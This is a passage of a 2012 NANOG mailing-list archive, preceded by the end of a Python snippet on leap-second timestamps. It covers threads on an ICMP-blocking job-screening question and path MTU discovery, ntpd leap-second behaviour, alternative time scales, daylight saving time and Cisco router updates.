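def leap_minute_2012():
    """The 57, 58, 59, 60, 00 sequence around the 2012-06-30 leap second."""
    start = from_tuple(1341100797, 1)  # 23:59:57 UTC, one earlier leap (2009) counted
    return [utc_label(ct) for ct in range(start, start + 5)]


if __name__ == "__main__":
    for label in leap_minute_2012():
        print(label)
    before = to_tuple(from_tuple(1341100799, 1))[:2]   # 2012-06-30 23:59:59
    after = to_tuple(from_tuple(1341100800, 2))[:2]    # 2012-07-01 00:00:00
    print("real seconds across the leap:", elapsed_seconds(before, after))
    print("naive POSIX difference:", after[0] - before[0])
    print("MJD delta (s):", mjd_delta_seconds(56113.6294791667, 56113.6301736111))
```

The tuple comparison reports two real seconds between 23:59:59 and the following 00:00:00, where a plain POSIX subtraction reports one; the two MJD values Peter posted come out 60 seconds apart.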
From straterra at fuhell.com Thu Jul 5 12:08:30 2012 From: straterra at fuhell.com (Thomas York) Date: Thu, 5 Jul 2012 13:08:30 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <153f01cd5ad0$cdeaffc0$69c0ff40$@fuhell.com>

My answer to that question would be "No..why would I ever blanket block ICMP? If I'm that stupid, I shouldn't be deploying firewalls at all." I also assume I wouldn't get the job after answering that... Thomas York

-----Original Message----- From: William Herrin [mailto:bill at herrin.us] Sent: Thursday, July 05, 2012 1:02 PM To: nanog at nanog.org Subject: job screening question

Hi folks, I gave my HR folks a screening question to ask candidates for an IP expert position. I've gotten some "unexpected" answers, so I want to do a sanity check and make sure I'm not asking something unreasonable. And by "unexpected" I don't mean naively incorrect answers, I mean oh-my-God-how-did-you-get-that-cisco-certification answers. The question was: You implement a firewall on which you block all ICMP packets. What part of the TCP protocol (not IP in general, TCP specifically) malfunctions as a result? My questions for you are: 1. As an expert who follows NANOG, do you know the answer? Or is this question too hard? 2. Is the question too vague? Is there a clearer way to word it? 3. Is there a better screening question I could pass to HR to ask and check the candidate's response against the supplied answer? Thanks, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004
From oliver at g.garraux.net Thu Jul 5 12:11:38 2012 From: oliver at g.garraux.net (Oliver Garraux) Date: Thu, 5 Jul 2012 13:11:38 -0400 Subject: job screening question In-Reply-To: References: Message-ID:

Seems fairly straightforward to me. It'll break path MTU discovery. I would hope someone applying for an "IP expert" position would know that. Could HR be mangling the question or something? Oliver ------------------------------------- Oliver Garraux Check out my blog: www.GetSimpliciti.com/blog Follow me on Twitter: twitter.com/olivergarraux

On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ......................
Web: > Falls Church, VA 22042-3004 >
From wp at null0.nl Thu Jul 5 12:11:58 2012 From: wp at null0.nl (Wouter Prins) Date: Thu, 5 Jul 2012 19:11:58 +0200 Subject: ipv6forum.com/nav6.org contacts Message-ID: hi all, Is there anyone active on this list who is actively working on/at ipv6forum.com/nav6.org? I tried to contact both administrative and technical contacts listed under the domain, but no response so far. Please unicast me in case you do. :) Thanks in advance! -- Wouter Prins wp at null0.nl
From bicknell at ufp.org Thu Jul 5 12:16:56 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Thu, 5 Jul 2012 10:16:56 -0700 Subject: job screening question In-Reply-To: References: Message-ID: <20120705171656.GA11490@ussenterprise.ufp.org> In a message written on Thu, Jul 05, 2012 at 01:02:08PM -0400, William Herrin wrote: > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? I suspect you're looking for Path MTU Discovery as an answer. > 2. Is the question too vague? Is there a clearer way to word it? I believe if you understand ICMP, it could be considered to be vague. For instance, blocking all ICMP means that if the network breaks during communication and a Host/Net unreachable is generated the connection will have to go through a timeout rather than an immediate tear down. Similarly, blocking ICMP source quench might break throttling in the 3 TCP implementations in the world that do that. :) > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? "A firewall is configured to block all ICMP packets and a system administrator reports problems with TCP connections not transferring data. What is the most likely cause?"
ICMP Packet-Too-Big being dropped and breaking PMTU discovery is the correct answer. When I study for my CCIE Recert every 2 years I find myself relearning "The Cisco Answer", rather than the right answer. It's not that the Cisco answers are often wrong per se, but they teach the most likely causes of things and want them back as the right answer. Cribbing from their test materials and study guides puts the questions in familiar terms that your candidates are likely to have seen, making them less likely to be thrown off by the question. Unless you want to throw them off. Depends on the level of folks you want to hire. I would answer your question with "I would never implement a firewall that breaks all TCP." :) -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/
From david at davidcoulson.net Thu Jul 5 12:16:49 2012 From: david at davidcoulson.net (David Coulson) Date: Thu, 05 Jul 2012 13:16:49 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <4FF5CC01.6010504@davidcoulson.net> That's a horrible question for a non-technical HR person to pose to a candidate - It's impossible for the candidate to ask clarifying questions to make sure they understand what you are looking for, plus you may have a strong candidate who gets it wrong (for whatever reason), but if they were talking to a technical person you would realize they were 99% of the way there. What if they said "it would cause the generation of port-unreachable ICMP packets to cease, and applications may hang until they timeout"? Not the answer you're looking for, but not wrong either. I leave HR to their standard screening stuff, and do the technical part myself. Less chance to skip over a good candidate, even if it takes a bit longer in the whole process.
On 7/5/12 1:02 PM, William Herrin wrote: > Hi folks, > > I gave my HR folks a screening question to ask candidates for an IP > expert position. I've gotten some "unexpected" answers, so I want to > do a sanity check and make sure I'm not asking something unreasonable. > And by "unexpected" I don't mean naively incorrect answers, I mean > oh-my-God-how-did-you-get-that-cisco-certification answers. > > The question was: > > You implement a firewall on which you block all ICMP packets. What > part of the TCP protocol (not IP in general, TCP specifically) > malfunctions as a result? > > > My questions for you are: > > 1. As an expert who follows NANOG, do you know the answer? Or is this > question too hard? > > 2. Is the question too vague? Is there a clearer way to word it? > > 3. Is there a better screening question I could pass to HR to ask and > check the candidate's response against the supplied answer? > > Thanks, > Bill Herrin > > From jmkeller at houseofzen.org Thu Jul 5 12:18:44 2012 From: jmkeller at houseofzen.org (James M Keller) Date: Thu, 05 Jul 2012 13:18:44 -0400 Subject: job screening question In-Reply-To: References: Message-ID: <4FF5CC74.7060006@houseofzen.org> On 7/5/2012 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. > > I would hope someone applying for an "IP expert" position would know that. > > Could HR be mangling the question or something? > > Oliver > > ------------------------------------- > > Oliver Garraux > Check out my blog: www.GetSimpliciti.com/blog > Follow me on Twitter: twitter.com/olivergarraux > > > On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: >> Hi folks, >> >> I gave my HR folks a screening question to ask candidates for an IP >> expert position. I've gotten some "unexpected" answers, so I want to >> do a sanity check and make sure I'm not asking something unreasonable. 
>> And by "unexpected" I don't mean naively incorrect answers, I mean >> oh-my-God-how-did-you-get-that-cisco-certification answers. >> >> The question was: >> >> You implement a firewall on which you block all ICMP packets. What >> part of the TCP protocol (not IP in general, TCP specifically) >> malfunctions as a result? >> >> >> My questions for you are: >> >> 1. As an expert who follows NANOG, do you know the answer? Or is this >> question too hard? >> >> 2. Is the question too vague? Is there a clearer way to word it? >> >> 3. Is there a better screening question I could pass to HR to ask and >> check the candidate's response against the supplied answer? >> >> Thanks, >> Bill Herrin >> >> >> -- >> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >> 3005 Crane Dr. ...................... Web: >> Falls Church, VA 22042-3004 >> > You would be surprised by some of the people I get off the street applying for senior network engineering positions who couldn't connect up a SOHO router and a dumb switch and make them work, let alone understand how PMTU discovery works. -- --- James M Keller
From djahandarie at gmail.com Thu Jul 5 12:20:19 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Thu, 5 Jul 2012 13:20:19 -0400 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. Since Bill said "(not IP in general, TCP specifically)", I don't think PMTUD breaking is what he's looking for. I'd venture more along the lines of lack of Destination Unreachables making things hang. -- Darius Jahandarie
From davehart at gmail.com Thu Jul 5 12:23:32 2012 From: davehart at gmail.com (Dave Hart) Date: Thu, 5 Jul 2012 17:23:32 +0000 Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com> Message-ID: On Wed, Jul 4, 2012 at 17:22 UTC, Scott Howard wrote: > On Wed, Jul 4, 2012 at 8:50 AM, Jimmy Hess wrote: > >> The NTP daemon could still provide a configuration option to not >> implement leap-seconds locally, or ignore the leap-second >> announcement received. So the admin can make a tradeoff favoring >> Stability over Correctness, of _allowing_ the local clock to become 1 >> second inaccurate for a short time after the rare occasion of a leap >> second; and step it or slew the local clock, eg include the leap >> second in the ordinary time correction, averaged over a period of >> time instead of a 1 second jump. >> > > Unless I'm mis-reading things, it already does - of sorts. I hope anyone implementing systems that depend on minutiae of leap seconds does not rely solely on your reading, but actually tests by inconveniently setting their clock and ntpd leapfile to actually insert a leap second. > According to the ntpd website ( > http://www.ntp.org/ntpfaq/NTP-s-algo-real.htm#AEN2499) : That FAQ is woefully out of date. http://support.ntp.org/ has more current information. The best reference for a given ntpd version is the html docs included in the tarball for that version. Some widely-used versions' html documentation is archived at http://doc.ntp.org/ > *The theory of leap seconds is explained in Q: 2.4.. In reality there are > two cases to consider: > > If the operating system implements the kernel discipline described in > Section 5.2, ntpd will announce insertion and deletion of leap seconds to > the kernel. The kernel will handle the leap seconds without further action > necessary. But exactly how it handles it is up to the kernel. Linux and FreeBSD essentially step the clock backward 1s at 23:59:60.0 UTC.
At least one system (I believe it was NetBSD or OpenBSD) instead stalls the clock for 1s: each reading of the clock during that period is greater than the prior, but the delta is microscopic and not related to elapsed time within that second; it simply preserves ordering of events. Dr. Mills attempted to exhort kernel developers to implement leap seconds while keeping the system time ever-increasing, but that advice was largely ignored because of implementation difficulty. For example, when first considered, NTP kernel extensions had microsecond precision. The approach of adding a tiny amount with each reading would open the system up to problems if apps could read the clock more than 1 million times during the leap second. It's also ugly for an SMP kernel to maintain global state on the last clock reading across processors. Most systems offer a monotonic alternative to the wall clock, typically implemented as an uptime counter in nominal SI seconds (nominal as defined by hardware, as the monotonic clock is _not_ disciplined by ntpd or affected by steps (setting the wall clock to a particular value)). Look for CLOCK_MONOTONIC in the documentation of clock_gettime. There are also interval-only timer facilities like timer_settime. The tools are at hand for those who understand the implications of clock steps (which can occur under circumstances other than leap seconds). > If the operating system does not implement the kernel discipline, the > clock will show an error of one second relative to NTP's time immediately > after the leap second. The situation will be handled just like an > unexpected change of time: The operating system will continue with the > wrong time for some time, but eventually ntpd will step the time. > Effectively this will cause the correction for leap seconds to be applied > too late. > * This is the historic behavior of ntpd, but after years of complaints, it was changed.
ntpd 4.2.6 and later step the clock backward 1s at the scheduled insertion if using the daemon loop discipline (as opposed to the kernel loop discipline). > Linux does implement the "kernel discipline" (via ntp_adjtime), so the > first option is what normally happens. However you can disable this with > an ntpd config option ("disable kernel") or via ntpdc at which point I'm > presuming it will fall back to the second option. > > The second option still gives you a step, but using the -x option to NTPD > will slew this step, giving a gradual correction to the 1 second difference. That is incorrect. -x is often misunderstood -- it does not disable stepping entirely, it raises the "step threshold" from 0.128s default to 600s. When ntpd synchronizes the clock and determines the offset exceeds the step threshold, the clock is stepped to the correct time. So long as you manage to keep your clock within 10 minutes of correct, -x isn't terribly different from disabling steps, but that's not what it does. In particular, when ntpd using the daemon loop implements a leap second by stepping the clock backward one second, the step threshold (and hence -x) is not a decision factor -- the step is taken. Cheers, Dave Hart
From r.engehausen at gmail.com Thu Jul 5 12:26:22 2012 From: r.engehausen at gmail.com (Roy) Date: Thu, 05 Jul 2012 10:26:22 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: <4FF5CE3E.6060603@gmail.com> On 7/5/2012 5:54 PM, Peter Lothberg wrote: >> Rather than discussing the pros and cons of UTC and leap seconds, just >> create your own time system. >> >> You could call it OpenTime. OpenTime will use NTP servers where the >> Stratum 1 servers are synced to some time standard that doesn't care >> about leap seconds. That way the consumer can choose to connect his >> machines to UTC or OpenTime. > And what do you do if "OpenTime" and "UTC" differ so that it matters? > > Does the flight leave at 1200 UTC or 1200 OpenTime?
> > ... Lets see. There have been nine leap seconds in 20 years. So at the start of the next century the difference will probably be less than a minute. Remember OpenTime is only for people who want their system clocks to ignore leap seconds. I don't include myself among the possible users of OpenTime.
From jeroen at unfix.org Thu Jul 5 12:27:40 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Thu, 05 Jul 2012 19:27:40 +0200 Subject: ipv6forum.com/nav6.org contacts In-Reply-To: References: Message-ID: <4FF5CE8C.6090502@unfix.org> On 2012-07-05 19:11 , Wouter Prins wrote: > hi all, > > Is there anyone active on this list who is actively working on/at > ipv6forum.com/nav6.org? > I tried to contact both administrative and technical contacts listed > under the domain, but no response so far. Latif Ladid is the right person for all of it who should be able to put you in touch with the right person for doing what you want to do. Greets, Jeroen
From nick at flhsi.com Thu Jul 5 12:28:40 2012 From: nick at flhsi.com (Nick Olsen) Date: Thu, 5 Jul 2012 13:28:40 -0400 Subject: job screening question Message-ID: <792371be$38c50419$2bae7501$@flhsi.com> +1 I have people wave the "I'm Cisco Certified" flag in my face all the time. Then proceed to ask me if we have a T1. To the point that it's no longer a valuable achievement in my eyes. I'm certified to perform CPR in the state of Florida... I should go apply for a surgeon position at the local hospital. Nick Olsen Network Operations (855) FLSPEED x106 ---------------------------------------- From: "James M Keller" Sent: Thursday, July 05, 2012 1:19 PM To: "Oliver Garraux" , nanog at nanog.org Subject: Re: job screening question On 7/5/2012 1:11 PM, Oliver Garraux wrote: > Seems fairly straightforward to me. It'll break path MTU discovery. > > I would hope someone applying for an "IP expert" position would know that. > > Could HR be mangling the question or something?
> > Oliver > > ------------------------------------- > > Oliver Garraux > Check out my blog: www.GetSimpliciti.com/blog > Follow me on Twitter: twitter.com/olivergarraux > > > On Thu, Jul 5, 2012 at 1:02 PM, William Herrin wrote: >> Hi folks, >> >> I gave my HR folks a screening question to ask candidates for an IP >> expert position. I've gotten some "unexpected" answers, so I want to >> do a sanity check and make sure I'm not asking something unreasonable. >> And by "unexpected" I don't mean naively incorrect answers, I mean >> oh-my-God-how-did-you-get-that-cisco-certification answers. >> >> The question was: >> >> You implement a firewall on which you block all ICMP packets. What >> part of the TCP protocol (not IP in general, TCP specifically) >> malfunctions as a result? >> >> >> My questions for you are: >> >> 1. As an expert who follows NANOG, do you know the answer? Or is this >> question too hard? >> >> 2. Is the question too vague? Is there a clearer way to word it? >> >> 3. Is there a better screening question I could pass to HR to ask and >> check the candidate's response against the supplied answer? >> >> Thanks, >> Bill Herrin >> >> >> -- >> William D. Herrin ................ herrin at dirtside.com bill at herrin.us >> 3005 Crane Dr. ...................... Web: >> Falls Church, VA 22042-3004 >> > You would be surprised by some of the people I get off the street applying for senior network engineering positions who couldn't connect up a SOHO router and a dumb switch and make them work, let alone understand how PMTU discovery works. 
-- --- James M Keller From bill at herrin.us Thu Jul 5 12:35:17 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:35:17 -0400 Subject: job screening question In-Reply-To: <4FF5CC01.6010504@davidcoulson.net> References: <4FF5CC01.6010504@davidcoulson.net> Message-ID: On Thu, Jul 5, 2012 at 1:16 PM, David Coulson wrote: > That's a horrible question for a non-technical HR person to pose to a > candidate - It's impossible for the candidate to ask clarifying questions to > make sure they understand what you are looking for, plus you may have a > strong candidate who gets it wrong (for whatever reason), but if they were > talking to a technical person you would realize they were 99% of the way > there. What if they said "it would cause the generation of port-unreachable > ICMP packets to cease, and applications may hang until they timeout"? Not > the answer you're looking for, but not wrong either. Hi David, To clarify: I asked HR to forward me the candidate's answer along with their resume. Just in case of answers like that one. Which would be more than enough to proceed to a phone screen directly with me. Regards, Bill -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From david at davidcoulson.net Thu Jul 5 12:37:12 2012 From: david at davidcoulson.net (David Coulson) Date: Thu, 05 Jul 2012 13:37:12 -0400 Subject: job screening question In-Reply-To: References: <4FF5CC01.6010504@davidcoulson.net> Message-ID: <4FF5D0C8.5070502@davidcoulson.net> Bill- So, I'm curious, and others probably are too. What's the most popular 'wrong' answer? 
:) David On 7/5/12 1:35 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 1:16 PM, David Coulson wrote: >> That's a horrible question for a non-technical HR person to pose to a >> candidate - It's impossible for the candidate to ask clarifying questions to >> make sure they understand what you are looking for, plus you may have a >> strong candidate who gets it wrong (for whatever reason), but if they were >> talking to a technical person you would realize they were 99% of the way >> there. What if they said "it would cause the generation of port-unreachable >> ICMP packets to cease, and applications may hang until they timeout"? Not >> the answer you're looking for, but not wrong either. > Hi David, > > To clarify: I asked HR to forward me the candidate's answer along with > their resume. Just in case of answers like that one. Which would be > more than enough to proceed to a phone screen directly with me. > > Regards, > Bill > > From george.herbert at gmail.com Thu Jul 5 12:38:28 2012 From: george.herbert at gmail.com (George Herbert) Date: Thu, 5 Jul 2012 10:38:28 -0700 Subject: job screening question In-Reply-To: References: Message-ID: On Jul 5, 2012, at 10:20 AM, Darius Jahandarie wrote: > On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >> Seems fairly straightforward to me. It'll break path MTU discovery. > > Since Bill said "(not IP in general, TCP specifically)", I don't think > PMTUD breaking is what he's looking for. > > I'd venture more along the lines of lack of Destination Unreachables > making things hang. All of DU failing, path MTU discovery, and congestion control / source quench might be the right / expected answer, which makes this a not great question. DU doesn't break TCP per se but would hang sessions until timeout; path MTU isn't a TCP function per se, though it uses TCP as the probe. Source quench is only a small fraction of the TCP congestion control solution space now. 
My systems consulting company uses a HR prescreen of 20 questions. It took a team of senior consultants and HR some years to tune the questions in. They need to be clear, have unambiguously correct answers, the answer correctness needs to be obvious to the HR / recruiter who isn't technical. I think this one fails to have an unambiguously correct answer and an answer the non-tech recruiter / HR person will understand. So, probably time for a better question... George William Herbert Sent from my iPhone From bill at herrin.us Thu Jul 5 12:41:42 2012 From: bill at herrin.us (William Herrin) Date: Thu, 5 Jul 2012 13:41:42 -0400 Subject: job screening question In-Reply-To: References: Message-ID: On Thu, Jul 5, 2012 at 1:20 PM, Darius Jahandarie wrote: > On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >> Seems fairly straightforward to me. It'll break path MTU discovery. > > Since Bill said "(not IP in general, TCP specifically)", I don't think > PMTUD breaking is what he's looking for. No, path MTU discovery is the answer I'm fishing for. The stack notifies TCP of the fragmentation needed message and TCP handles it within the TCP stack. Managing path MTU discovery is specific to each layer-4 protocol even if the trigger message (destination unreachable, fragmentation needed but DF set) is the same. If a candidate gives me a more clever answer, I'd take that too. :-) "This would block all IP traffic." is not a correct answer. It's not even a naively incorrect answer. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From sla at ucolick.org Thu Jul 5 12:42:49 2012 From: sla at ucolick.org (Steve Allen) Date: Thu, 5 Jul 2012 10:42:49 -0700 Subject: F-ckin Leap Seconds, how do they work? 
In-Reply-To: <4FF5CE3E.6060603@gmail.com> References: <4FF5CE3E.6060603@gmail.com> Message-ID: <20120705174249.GD28857@ucolick.org> On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: > Lets see. There have been nine leap seconds in 20 years. So at the > start of the next century the difference will probably be less than a minute There is no predicting how large the decadal variations in LOD will be, but the difference should be somewhere between 1 minute and 3 minutes. Please see these charts and tables for how unpredictable it is. http://www.ucolick.org/~sla/leapsecs/dutc.html > Remember OpenTime is only for people who want their system clocks to > ignore leap seconds. I don't include myself among the possible users of > OpenTime. Anyone who needs that can already do that using existing, deployed, and tested code and hardware and the GPS system time scale. Please see this worked example. Please do not invent yet another private time scale. http://www.ucolick.org/~sla/leapsecs/right+gps.html -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory--ISB Natural Sciences II, Room 165 Lat +36.99855 1156 High Street Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From derek at derekivey.com Thu Jul 5 12:45:54 2012 From: derek at derekivey.com (Derek Ivey) Date: Thu, 5 Jul 2012 13:45:54 -0400 Subject: job screening question In-Reply-To: References: Message-ID: This is exactly the issue comcast6.net is currently experiencing :). They seem to be blocking ICMP completely and that is causing my HE IPv6 tunnel to be unable to access their site from a browser. On Jul 5, 2012, at 1:41 PM, William Herrin wrote: > On Thu, Jul 5, 2012 at 1:20 PM, Darius Jahandarie wrote: >> On Thu, Jul 5, 2012 at 1:11 PM, Oliver Garraux wrote: >>> Seems fairly straightforward to me. It'll break path MTU discovery. >> >> Since Bill said "(not IP in general, TCP specifically)", I don't think >> PMTUD breaking is what he's looking for. 
> > No, path MTU discovery is the answer I'm fishing for. The stack > notifies TCP of the fragmentation needed message and TCP handles it > within the TCP stack. Managing path MTU discovery is specific to each > layer-4 protocol even if the trigger message (destination unreachable, > fragmentation needed but DF set) is the same. > > If a candidate gives me a more clever answer, I'd take that too. :-) > > "This would block all IP traffic." is not a correct answer. It's not > even a naively incorrect answer. > > Regards, > Bill Herrin > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 >
From owen at delong.com Thu Jul 5 12:42:01 2012 From: owen at delong.com (Owen DeLong) Date: Thu, 5 Jul 2012 10:42:01 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120705170704.GA19613@puck.nether.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> <20120705170704.GA19613@puck.nether.net> Message-ID: <375E4EFB-9C55-406A-8152-BDD683F67516@delong.com> On Jul 5, 2012, at 10:07 AM, Jared Mauch wrote: > On Thu, Jul 05, 2012 at 09:33:05AM -0700, Owen DeLong wrote: >>>> >>> >>> I'm only at (approximately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. >>> >>> There is a band of latitudes where it does make more sense. >> >> Why punish the rest of us to accommodate a few people who live between about 50° and 55° latitude? > > (easier typing with a real keyboard)... > > This is a local/states rights issue imho :) AZ ignores DST and as a result > I never know what time it is there ;) > > This is a local state-by-state and county-by-county issue as evidenced > by the behavior of counties in Indiana that are close to or within > the Chicago MSA.
This is more a social issue than anything else. > > Many people prefer some daylight when they are not working. As do I... Which, if we simply go with PDT all year long, I'd basically have most of the year. I don't get that with standard time during winter anyway and PDT wouldn't help with that. Daylight time does not add length to the daylight period of the day, it merely reduces the time between wake-up and daylight for some portion of winter time. (Standard time has become the anomaly with daylight savings time being practiced for nearly 8 months each year now). I'm fine with leaving all the clocks permanently on daylight time. Just get rid of the twice-a-year timezone shift. I don't care what timezone we pick, just pick one and stick with it. Owen From george.herbert at gmail.com Thu Jul 5 12:46:56 2012 From: george.herbert at gmail.com (George Herbert) Date: Thu, 5 Jul 2012 10:46:56 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: <517F600E-FE6F-442B-8A6E-69A9CA196045@gmail.com> On Jul 5, 2012, at 8:14 AM, Marshall Eubanks wrote: > > And, by the way, the deformations and exchanges of angular momentum > that drive Earth rotation variations are probably the best understood > global geophysical processes there are. Absolutely no magic is > required. Not the tectonic ones. The deeper geophysical ones yes, but tectonics is irregular. We understand the underlying plate segment motions well but they express very irregularly over year-decade scales. George William Herbert Sent from my iPhone From r.engehausen at gmail.com Thu Jul 5 13:02:57 2012 From: r.engehausen at gmail.com (Roy) Date: Thu, 05 Jul 2012 11:02:57 -0700 Subject: F-ckin Leap Seconds, how do they work? 
In-Reply-To: <20120705174249.GD28857@ucolick.org> References: <4FF5CE3E.6060603@gmail.com> <20120705174249.GD28857@ucolick.org> Message-ID: <4FF5D6D1.9040303@gmail.com> On 7/5/2012 10:42 AM, Steve Allen wrote: > On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: >> Lets see. There have been nine leap seconds in 20 years. So at the >> start of the next century the difference will probably be less than a minute > There is no predicting how large the decadal variations in LOD will be, > but the difference should be somewhere between 1 minute and 3 minutes. > Please see these charts and tables for how unpredictable it is. > http://www.ucolick.org/~sla/leapsecs/dutc.html > >> Remember OpenTime is only for people who want their system clocks to >> ignore leap seconds. I don't include myself among the possible users of >> OpenTime. > Anyone who needs that can already do that using existing, deployed, > and tested code and hardware and the GPS system time scale. Please > see this worked example. Please do not invent yet another private > time scale. > http://www.ucolick.org/~sla/leapsecs/right+gps.html > > ... So basically the concept of OpenTime is already implemented. All that's needed is a list of Stratum-1 servers that anyone can use. From shortdudey123 at gmail.com Thu Jul 5 13:04:18 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Thu, 5 Jul 2012 13:04:18 -0500 Subject: Cisco Update In-Reply-To: References: <5.1.1.6.2.20120705190432.0092ea18@efes.iucc.ac.il> <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info> Message-ID: Keep in mind, that to receive the update, the router has to be connected to the internet. So routers that are not connected to the internet by design will be unaffected. 
-Grant On Thu, Jul 5, 2012 at 11:55 AM, David Hubbard <dhubbard at dino.hostasaurus.com> wrote: > Technical users could always just flash DD-WRT onto the device and replace > the Linksys/Cisco firmware; then you have a much more robust system without > any big brother stuff. > >
From tyler.haske at gmail.com Thu Jul 5 13:40:28 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Thu, 5 Jul 2012 14:40:28 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF5D6D1.9040303@gmail.com> References: <4FF5CE3E.6060603@gmail.com> <20120705174249.GD28857@ucolick.org> <4FF5D6D1.9040303@gmail.com> Message-ID: On Thu, Jul 5, 2012 at 2:02 PM, Roy wrote: > On 7/5/2012 10:42 AM, Steve Allen wrote: >> >> On Thu 2012-07-05T10:26:22 -0700, Roy hath writ: >>> >>> Lets see. There have been nine leap seconds in 20 years. So at the >>> start of the next century the difference will probably be less than a >>> minute >> >> There is no predicting how large the decadal variations in LOD will be, >> but the difference should be somewhere between 1 minute and 3 minutes. >> Please see these charts and tables for how unpredictable it is. >> http://www.ucolick.org/~sla/leapsecs/dutc.html >> >>> Remember OpenTime is only for people who want their system clocks to >>> ignore leap seconds. I don't include myself among the possible users of >>> OpenTime. >> >> Anyone who needs that can already do that using existing, deployed, >> and tested code and hardware and the GPS system time scale. Please >> see this worked example. Please do not invent yet another private >> time scale. >> http://www.ucolick.org/~sla/leapsecs/right+gps.html >> >> ... > > > So basically the concept of OpenTime is already implemented. All that's > needed is a list of Stratum-1 servers that anyone can use. From the website: ----- The scheme described in this web page uses a non-standard NTP server and a non-standard set of "right" zoneinfo files.
The hard part is that the zoneinfo files must be hacked for GPS time and recompiled whenever a leap second is announced. Hopefully that recompile happens long before the leap second occurs. In this scheme the kernel does not have to handle the leap second. All of the handling of the leap second happens in the zoneinfo files. This is effectively the same as the bi-annual handling of daylight/summer time transitions. There are no real-time changes. Everything about the changes can be easily tested at any time by any user. ---- Wouldn't an easier way be to separate out the timescales, where one is just 84600 seconds a day for the next 100 years, and another can keep accurate time for those that need that kind of accuracy? The POSIX standard can remain unchanged, and time can be monotonic. When the cumulative difference is like 5 minutes, we can have a huge public 5 year lead time thing to sync the timescales again. (Kind of like DST, no matter how publicly and how often and how well you tell people, folks will still show up to work late). From the website again: ---- A system whose time_t is set using an NTP server giving GPS time (thus the kernel does not have to handle leap seconds) and which is configured to use the usual zoneinfo files will produce formatted date/time strings which are 15 seconds larger than official time. (The value 15 will increment at each leap second.) According to the developer forums this is the variation that Google has chosen for Android devices. ---- This seems like a good kludge. But a second is an arbitrary measure. We might as well add leap half seconds, or leap tenths of a second. I'd prefer leap minutes, so we can have these kinds of threads about 1/60th of the time :) Not that I don't find this entertaining.
From msa at latt.net Thu Jul 5 13:58:33 2012 From: msa at latt.net (Majdi S. Abbas) Date: Thu, 5 Jul 2012 14:58:33 -0400 Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <20120705170704.GA19613@puck.nether.net>
References: <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> <20120705170704.GA19613@puck.nether.net>
Message-ID: <20120705185832.GA9043@puck.nether.net>

On Thu, Jul 05, 2012 at 01:07:04PM -0400, Jared Mauch wrote:
> This is a local/states rights issue imho :) AZ ignores DST and as a result
> I never know what time it is there ;)

